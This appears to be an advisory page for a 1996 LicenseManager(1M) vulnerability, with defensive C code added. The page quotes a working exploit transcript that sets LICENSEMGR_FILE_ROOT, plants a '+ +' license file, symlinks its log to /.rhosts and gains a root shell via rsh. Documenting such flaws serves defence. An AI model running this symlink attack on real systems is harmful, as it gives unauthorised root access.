Vendor: LicenseManager(1M)
By: SecurityFocus
CVSS: 7.2 (HIGH)
Arbitrary File Manipulation
CWE: 264
Product Name: LicenseManager(1M)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
1996

LicenseManager(1M) Arbitrary File Manipulation Vulnerability

Under normal operation, LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrarily manipulate root-owned files, allowing root access. To exploit this vulnerability, an attacker must create a directory, set the environment variable LICENSEMGR_FILE_ROOT to that directory, create a license.dat file, create a symbolic link from license.dat.log to /.rhosts, and then run LicenseManager. When the attacker clicks on Update, fills in the four fields with any information and clicks on Apply, LicenseManager will report an error. Ignoring the error and exiting will allow the attacker to access the root-owned file /.rhosts.

Mitigation:

The vendor has released a patch to address this vulnerability.
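
An added example (not the vendor's patch, whose contents this page does not describe) of two checks a privileged program can apply before writing a log such as license.dat.log: ignore LICENSEMGR_FILE_ROOT when running with elevated privileges, and refuse to open a log path that is a symbolic link. It assumes the program runs with an effective id different from the caller's; `file_root`, `open_log_nofollow` and `demo` are hypothetical names.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: when running with elevated privileges (effective id
 * differs from real id), ignore the caller-supplied LICENSEMGR_FILE_ROOT. */
const char *file_root(void) {
    const char *env = getenv("LICENSEMGR_FILE_ROOT");
    if (env == NULL || getuid() != geteuid() || getgid() != getegid())
        return "";                 /* fall back to the system /var/flexlm */
    return env;
}

/* Hypothetical helper: open a log for append, refusing a symlink as the
 * final path component and anything but a singly linked regular file. */
int open_log_nofollow(const char *path) {
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;         /* Linux reports ELOOP for a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed self-check: with license.dat.log symlinked to a scratch file,
 * the open must be refused and the scratch file stay empty. Returns 0 if so. */
int demo(void) {
    char dir[] = "/tmp/lmdemoXXXXXX", target[64], lnk[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(lnk, sizeof lnk, "%s/license.dat.log", dir);
    int t = open(target, O_WRONLY | O_CREAT, 0600);
    if (t < 0 || close(t) != 0 || symlink(target, lnk) != 0) return 2;
    int fd = open_log_nofollow(lnk);
    int refused = (fd < 0 && errno == ELOOP);
    if (fd >= 0) close(fd);
    int untouched = (stat(target, &st) == 0 && st.st_size == 0);
    unlink(lnk); unlink(target); rmdir(dir);
    return (refused && untouched) ? 0 : 3;
}
int main(void) { return demo(); }
```

O_NOFOLLOW only covers the final path component, so a privileged program still should not write under a directory the caller chose; the `file_root` check addresses that part.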
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/73/info

Under normal operation, LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrarily manipulate root-owned files, allowing root access.

% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &

Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.

% cat /.rhosts


Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996

#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah

% rsh localhost -l root
#